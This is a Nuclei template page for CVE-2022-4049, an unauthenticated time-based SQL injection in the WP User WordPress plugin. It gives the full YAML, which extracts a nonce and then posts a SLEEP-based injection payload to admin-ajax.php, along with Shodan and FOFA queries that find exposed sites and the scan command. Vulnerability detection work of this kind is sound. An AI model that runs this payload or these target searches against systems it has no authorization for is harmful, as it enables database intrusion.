Skip to content
Nuclei Templates

WP User <= 7.0 - Unauthenticated SQLi

ID: CVE-2022-4049

Severity: critical

Author: theamanrawat

Tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project

Description

Section titled “Description”

The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.

YAML Source

Section titled “YAML Source”
id: CVE-2022-4049


info:
  name: WP User <= 7.0 - Unauthenticated SQLi
  author: theamanrawat
  severity: critical
  description: |
    The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
  reference:
    - https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be
    - https://wordpress.org/plugins/wp-user/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4049
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4049
    cwe-id: CWE-89
    epss-score: 0.04713
    epss-percentile: 0.92631
    cpe: cpe:2.3:a:wp_user_project:wp_user:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 4
    vendor: wp_user_project
    product: wp_user
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/wp-user/
    fofa-query: body=/wp-content/plugins/wp-user/
    publicwww-query: /wp-content/plugins/wp-user/
  tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project


http:
  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        action=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)


    attack: clusterbomb
    payloads:
      path:
        - "/index.php/user/"
        - "/user"


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 200
          - contains(header_2, "text/html")
          - contains(body_2, 'Invalid Access')
        condition: and


    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"wpuser_update_setting":"([0-9a-zA-Z]+)"'
        internal: true
# digest: 4b0a00483046022100adf9f86f08dba23ef26c5eb6a3791eb1c54430cfc1d19a38097cb0709bd2e52b022100c7ad9e5314722d0fa9d070f41222e9aaff495cf112d34c7b4cafd26b348f6e47:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4049.yaml"

View on Github